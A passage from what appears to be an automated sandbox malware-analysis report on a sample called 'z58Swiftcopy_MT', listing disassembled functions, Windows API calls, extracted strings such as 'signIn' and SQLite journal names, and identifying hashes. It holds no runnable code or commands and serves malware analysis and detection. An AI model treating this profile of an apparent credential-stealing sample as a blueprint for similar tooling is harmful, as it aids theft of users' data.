                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a77d1a153e4db6e53d86637d525c0b6f23984a2685c1b6acb3711ab2d61cf685
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                                      Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&quot;,0000000C,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EB6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AB,&amp;,0000000A,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EE2
                                                                                                                                                                                                                                      • memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                                      Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,004133E1,00000000,00000000), ref: 00413A7A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,00000000), ref: 00413C4E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                                                                                      • Opcode ID: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60cd21eba0755187b3415576207be6f8e5fc256c319da37b94ce2418303dd88c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                                      Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                                                                                                        • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                                                                                                                                      • LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                                                                                                                                                                                                                        • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                                                                                                      • String ID: strings
                                                                                                                                                                                                                                      • API String ID: 3166385802-3030018805
                                                                                                                                                                                                                                      • Opcode ID: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                      • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 07dd20e83a72376c017d688d2d43246e42d1d17d60f688a4af98472ad4cd9316
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                                                                                                      Function 00411AC5 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 59COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00411AF6
                                                                                                                                                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                                                                                                      • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                                                                                                      • String ID: AE$.cfg$General$EA
                                                                                                                                                                                                                                      • API String ID: 776488737-1622828088
                                                                                                                                                                                                                                      • Opcode ID: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                      • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 83214be69100a2e0159230acb683643c3f3e541604283d72b2cc5b33c3359a8e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                                                                                                      Function 0040D898 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                                                                                                      • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                                                                                                      • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0040D906
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                                                                                                        • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                                                                                                        • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                                                                                                      • String ID: sysdatetimepick32
                                                                                                                                                                                                                                      • API String ID: 1028950076-4169760276
                                                                                                                                                                                                                                      • Opcode ID: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                      • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc1af48194af82a98770d28407c75daa8b541611d8ddf07168db58443698622d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                                                                                                      Function 0041B7D9 Relevance: 12.3, APIs: 6, Strings: 2, Instructions: 269COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B911
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B923
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-journal,00000008,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B93B
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,00000000,00000000,?,?,?,?,?,?,00000000,00000000,00000000,?,0041EF66,00000000,00000000), ref: 0041B958
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,-wal,00000004,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0041B970
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041BA3D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: -journal$-wal
                                                                                                                                                                                                                                      • API String ID: 438689982-2894717839
                                                                                                                                                                                                                                      • Opcode ID: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                      • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d962323e81d37dfb90646eb98bd258cd4124eefff3809fb07e01f1771a5947a6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                                                                                                      Function 00405B83 Relevance: 12.2, APIs: 8, Instructions: 197windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                                                                                                      • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                                                                                                        • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                                                                                                      • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                                                                                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Item$Dialog$MessageSend
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3975816621-0
                                                                                                                                                                                                                                      • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                      • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                                                                                                      Function 00444C89 Relevance: 12.2, APIs: 3, Strings: 5, Instructions: 154COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                                                                                                      • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                                                                                                      • API String ID: 1214746602-2708368587
                                                                                                                                                                                                                                      • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                      • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                                                                                                      Function 00405DD1 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00405E33
                                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                                                                                                                                                      • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2313361498-0
                                                                                                                                                                                                                                      • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                      • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                                                                                                      Function 00405F4E Relevance: 12.1, APIs: 8, Instructions: 89windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                                                                                                        • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2047574939-0
                                                                                                                                                                                                                                      • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                      • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                                                                                                      Function 0041881C Relevance: 12.1, APIs: 8, Instructions: 70timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 4218492932-0
                                                                                                                                                                                                                                      • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                      • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                                                                                                      Function 0044A7C0 Relevance: 10.7, APIs: 6, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                                                                                                                                        • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                                                                                                                                        • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                                                                                                                                                      • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memcpy$memset
                                                                                                                                                                                                                                      • String ID: gj
                                                                                                                                                                                                                                      • API String ID: 438689982-4203073231
                                                                                                                                                                                                                                      • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
